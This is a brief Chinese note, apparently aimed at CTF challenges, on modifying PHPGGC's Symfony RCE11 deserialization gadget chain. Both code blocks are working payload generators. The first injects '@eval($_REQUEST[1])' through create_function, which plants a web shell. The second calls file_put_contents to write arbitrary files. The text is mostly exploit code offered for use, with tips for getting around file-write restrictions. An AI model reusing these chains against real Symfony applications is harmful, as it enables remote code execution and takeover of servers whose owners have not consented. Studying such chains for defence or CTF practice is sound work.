phpggc的symfony
- 默认使用call_user_func时只有一个参数,如果用数组传递多个参数,则会报错
- 如果你要执行更复杂的内容,可以考虑使用create_function进行注入,修改源代码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
namespace GadgetChain\Symfony;
class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
public static $version = '2.0.4 <= 5.4.24 (all)';
public static $vector = '__destruct';
public static $author = 'cfreal';
public function generate(array $parameters)
{
$a = new \Symfony\Component\Validator\ConstraintViolationList([
'$a',
';};@eval($_REQUEST[1]);var_dump(111111);#',
]);
$b = new \Symfony\Component\Finder\Iterator\SortableIterator($a, 'create_function');
$c = new \Symfony\Component\Validator\ConstraintViolationList($b);
$d = new \Symfony\Component\Security\Core\Authentication\Token\AnonymousToken($c);
return $d;
}
}
此外,经高人指点,可以利用如下代码来执行多参数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
namespace GadgetChain\Symfony;
class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
public static $version = '2.0.4 <= 5.4.24 (all)';
public static $vector = '__destruct';
public static $author = 'cfreal';
public function generate(array $parameters)
{
$a = new \Symfony\Component\Validator\ConstraintViolationList([
'/tmp/11',
'11',
]);
$b = new \Symfony\Component\Finder\Iterator\SortableIterator($a, 'file_put_contents');
$c = new \Symfony\Component\Validator\ConstraintViolationList($b);
$d = new \Symfony\Component\Security\Core\Authentication\Token\AnonymousToken($c);
return $d;
}
}
如果题目禁止了写文件,则难以上传webshell,此时第一种方法最好用。